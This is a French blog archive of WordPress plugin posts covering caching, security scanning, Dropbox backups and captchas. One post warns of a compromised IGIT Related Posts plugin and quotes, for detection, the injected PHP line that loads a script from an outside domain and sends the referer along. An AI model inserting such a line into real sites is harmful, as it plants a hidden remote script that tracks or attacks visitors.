Archive for the ‘Plugin’ Category
Posted by Thierry Roget »
Add Comment »
J’utilise le plugin wp-super-cache sur l’ensemble de mes blogues. Ce plugin permet de mettre en memoire sous forme de pages statiques les pages les plus vues de votre blogue afin de soulager les requêtes serveur. J’ai remarqué qu’ avec les themes Elegantthemes* certains déraillement. C’est peut-être du à ce plugin.
En effet, Je n’arrive pas forcément à me loguer correctement et je tombe sur la page “error 404″. Finalement après avoir tourné le problème dans tous les sens, j’ai pu me rendre compte qu’en vidant le cache de wp-super-cache, les choses revenaient normalement. C”est-à-dire que je pouvais accéder normalement à mes billets e, édition sans avoir à répéter l’opération plusieurs fois. Bien sûr le cache se remplit de nouveau est le problème réaparait, mais entre temps j’ai déjà fini décrire mon billet.
Si vous utilisez Elegantthemes*, avez vous le même problème?
* lien d’affiliation
Posted by Thierry Roget »
Add Comment »Je viens d’installer un plugin de sécurité sur mon blogue. Ce n’est pas une nouveauté, mais dans ce blogue, je dis uniquement ce que je fais, et je fais uniquement ce que je dis. C’est d’ailleurs pour cela que je n’y blogue pas souvent.
J’ai donc installé http://wordpress.org/extend/plugins/wp-security-scan
En fait c’est tellement simple d’utiliser ce plugin, que franchement je me demande pourquoi je n’ai pas fait ça plus tôt! Ce n’est pas très spectaculaire et comme tout était à peu près vert chez moi, je ne me suis pas trop posé de questions. L’important tout de même c’est d’avoir renommé ma base e données qui commençait par wp_ en un autre préfixe, pour durcir un peu ce blogue.
Donc ça commence avec la partie “security” c’est là que j’ai constaté que ma base de données devait changer de préfice. Ensuite avec la partie “Scanner” tout était au vert, c-à-dire que mes fichiers un peu stratégiques étaient dans le bon mode d’écriture et lecture, puis côté “Database” c’est la partie où on peut faire un backup manuel. La sauvegarder de la base de données est recommandé . J’en fais une fois par semaine sur tous mes blogues.
Avant de faire ça sur votre blogue principal, je vous conseille de le faire sur un autre blogue un peu moins stratégique. Si vous n’avez qu’un blogue, vous pouvez au moins créer un blogue avec un sous domaine, exemple test.votrecomaine.com.
Pour la partie .htaccess, il semble que je dois déplacer ce fichier dans wp-admin. Il faut procéder par ordre.
Posted by Thierry Roget »
1 Comment »Vincent vient de nous faire part d’une faille de sécurité sur un plugin Related Posts de IGIT, qui utilise des petites vignettes pour illustrer les billets relatifs. Vous pouvez aller voir dans son billet (vincentabry.com) à l’heure actuelle, son site est planté et j’espère qu’il va se rétablir bientôt.
la page du plugin pour infomation
c’est exactement le même problème que j’ai eu avec mes thèmes de chez Eleganthèmes lié à un problème avec Timthumb ! (attention je ne fais que répèter ce que je lis à droite à gauche.
Ce que j’ai compris c’est qu’il faut désinstaller le plugin immédiatement et ensuite aller dans le début de la page index.php pour regarder si on a pas une script de ce type.
echo ‘<script type=”text/javascript” language=”javascript” src=”http://superpuperdomain.com/count.php?ref=’.urlencode($_SERVER['HTTP_REFERER']) .’”></script>’;
Comme je n’ai pas été affécté et que le site de vincent est hs, voilà deux autres sources qui peuvent vous inspirer
http://wordpress.org/attention-igit-related-posts-with-thumb-image-after-posts-phpremoteview-attack
http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/
http://www.maistrafego.pt/wordpress-vulnerabilidade-timthumb-igit-related-posts
En tout cas, c’est assez urgent,
Posted by Thierry Roget »
5 Comments »
Il existe un plugin sympathique que j’utilise depuis longtemps qui s’appelle “WordPress Database Backup” il permet de faire des backup régulier et automatique. Ce qui est très utile.
Si on est ultra paranoïaque en terme de sécurité, autant s’arranger pour sauvegarder nos bases sur le merveilleux outil qui s’appelle dropbox que je conseille à tout le monde.
Pour ceux qui ne connaissent pas dropbox c’est un outil qui sauvegarde vos données en ligne à partir d’un de vos répertoire qui se trouve sur votre disque dur. C’est la panacée en terme de backup et vous avez 2go octet avant d’avoir à payer. Personnellement j’ai 11 Go!
Alors pourquoi pas envoyer nos backups directement dans dropbox! C’est ce que propose le plugin WordPress Backup to Dropbox que vous pourrez installer directement à partir de l’administration de votre blogue.
Une fois installé, vous allez devoir autoriser le plugin à dialoguer avec dropbox. Ce n’est pas très compliqué, il faut simplement aller dans “Réglage” sélectionnez “Back up to dropbox” et demander l’autorisation.
Une fois autorisé vous n’aurez plus qu’à ajuster le réglage très complet surtout en terme de fréquence de sauvegarde : journalière pour ceux qui bloguent souvent et jusqu’à 12 semaine pour ceux qui ne bloguent pas souvent. En plus vous pouvez choisir l’heure et le jour de la semaine pour la sauvegarde.
Voilà un plugin que je vais mettre en teste sur mon blogue 01langue.org en test avant de peut-être génaraliser.
Sachez que je n’ai pas attendu ce plugin pour faire ce genre de backup, mais je le fais avec l’autre merveilleux outil concurrent à dropbox qui est sugarsynch. Ce service offre un mail par défaut pour justement envoyer un fichier. Dans le plugin “WordPress Database Backup” Il suffit de renseigner l’adresse de sugarsynch et c’est réglé.
Posted by Thierry Roget »
4 Comments »
Il y a peu de temps j’étais fier de vous présenter invisible captcha, j’ai même généralisé l’installation sur tous mes blogues, mais surprise, sur 1sens.net le rythme de spams était toujours incroyable. Bien sûr Askimet fait son boulot, mais quand vous avez une liste de 200 spams qu’il faut tout de même vérifier pour voir si un lecteur honnête y a mis un commentaire intelligent, ça prend du temps et c’est du temps très inutile.
Alors cette fois j’ai installé “Conditional CAPTCHA pour WordPress” disponible sur votre interface d’administration de votre blogue vous pouvez toujours trouver la version sur le site rayofsolaris.net
ça marche à priori bien et en plus c’est traduit en français
petite explication : le plugin ne demande qu’un Captcha que s’il détecte que le commentaire est un spam potentiel (indiqué par exemple par Askimet). Intelligent non?
Voilà plus de spam depuis trois jours,
Posted by Thierry Roget »
3 Comments »J’ai longtemps hésité à mettre un captcha sur mes blogues. Le captcha permet de détecter si vous êtes un robot ou un être humain. Si le blogues possède une option de captcha, quand vous voulez faire un commentaire, vous devez normalement recopier un mot ou des chiffres qui s’affichent sur le blogue avant d’y mettre un commentaire. Le problème c’est que ça rebute non seulement les robots, mais aussi les êtres humains, qui vont fuir un peu votre blogue, car ils n’ont pas de temps à perdre, sans compter que parfois, le captcha est tellement compliqué, qu’il faut s’y reprendre à plusieurs fois!
exemple de captcha
Dans cet exemple, il m’est difficile de lire le catcha, ce qui gonfle un peu! Vous avez également déjà dû rencontré ce type là. Il ne propose que des mots en anglais, alors si vous ne parlez pas l’anglais ça complique les choses.
J’ai donc décidé de généraliser sur mes blogues, le plugin invisible captcha. (y Andrey Sorvin | Visit plugin site). Si j’ai bien compris, un robot qui passe sur votre blogue rempli bêtement l’ensemble du formulaire de commentaire. Le plugin intègre une ligne de formulaire invisible pour les êtres humains, que le robot lui, va bêtement remplir. Ensuite c’est simple, pour que votre commentaire soit validé, il faut que cette case soit vide! Comme le robot est stupide ! Astucieux non!?
Pour installer le plugin, aller dans “plugin” “add new” et taper “invisible captcha” dans la moteur de recherche.
Posted by Thierry Roget »
3 Comments »
Chaque blogueur un peu geek qui utilise wordpress, se doit de publier de temps en temps la liste des plug in qu’il utilise. (cf la définition de plugin sur wikipedia). On y verra d’ailleurs de titre alléchant comme “les plugins indispensables pour wordpress”, “les plugin a installer obligatoirement sur un blog wordpress“.
Mais rien ne faut un retour statistique et réel, cela rend les choses plus pragmatiques. Le blog de dreamhost (hébergeur de site et blog très connu) vient de fournir une liste des plugins wordpress qui sont installés sur les 500 000 blogs wordpress qu’il héberge. Il vient de fournit cette liste par ordre décroissants d’usage
J’utilise les 6 permiers plugin sur cette liste, à vous de juger.
Posted by Thierry Roget »
Add Comment »
La question revient régulièrement à propos de wordpress et mon expérience sur le sujet est très pragmatique! Il n’y pas de liste magique car chaque blog possède ses caractéristiques et chacun va personnaliser son blog en fonction de critères qui lui sont propres.
Exemple pragmatique sur mon blog principal http://roget.biz/le-blog où j’explique les plugins que j’ai installé et pourquoi:
- les plugins indispensables comme le module askimet qui limite les spams dans les commentaires
- les plugins très utile: une liste de plugin qui sont utiles pour mon blog, mais pas forcément utile pour votre blog
- Plugin desinstallés provisoirement.
- Les plugins qui ne sont plus utilisés: Parce que un blog change, on est amené à changer également les plugin.
Mon conseil toutefois et d’y aller doucement et petit à petit, sachez que les plugins sollicitent votre serveur et les requêtes sql sur votre serveur (pour la plupart des plugins) et qu’il peuvent endommager les performances de votre blog. D’autres part utilisez les plugins populaires ce sont les moins bugués à mon goût.
Sinon pour une autre lecture vous pouvez jeter un coup d’oeil sur
